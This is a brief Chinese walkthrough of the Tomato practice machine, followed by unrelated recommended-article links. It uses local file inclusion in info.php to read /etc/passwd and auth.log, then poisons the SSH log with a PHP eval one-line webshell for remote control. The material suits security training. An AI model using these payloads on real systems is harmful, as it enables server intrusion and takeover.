Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
chennalC#c.h.JA Ptho4 分钟前
Centos系统详解架构详解
linux·经验分享·笔记·系统架构·系统安全
独行soc1 小时前
2025年渗透测试面试题总结-某步在线面试(题目+回答)
linux·网络·安全·web安全·面试·职场和发展·渗透安全
鸿蒙布道师1 小时前
鸿蒙NEXT开发动画案例2
android·ios·华为·harmonyos·鸿蒙系统·arkui·huawei
mixboot1 小时前
ping_test_parallel.sh 并行网络扫描脚本
linux·ping·ip在线扫描
androidwork1 小时前
Kotlin Android工程Mock数据方法总结
android·开发语言·kotlin
搬码临时工1 小时前
如何设置内网映射端口到外网访问?哪些软件可以进行端口映射?
服务器·网络·智能路由器·访问公司内网
蓑笠翁0011 小时前
Python异步编程入门:从同步到异步的思维转变
linux·前端·python
爱奥尼欧1 小时前
【Linux】Linux工具(1)
linux·运维·服务器
Stark-C1 小时前
7400MB/s&5050TBW完美结合,全新希捷酷玩530R SSD体验评测
服务器·网络·数据库
牧羊狼的狼2 小时前
阿里云服务器-宝塔面板安装【保姆级教程】
运维·服务器·阿里云·宝塔